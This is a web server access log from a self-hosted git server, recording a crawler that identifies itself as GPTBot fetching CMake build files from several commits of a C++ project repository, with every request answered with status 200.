"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15273] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15273] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15271] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24303] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11183] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24301] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16060] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:11:24 +0000] - 200 200 - GET https 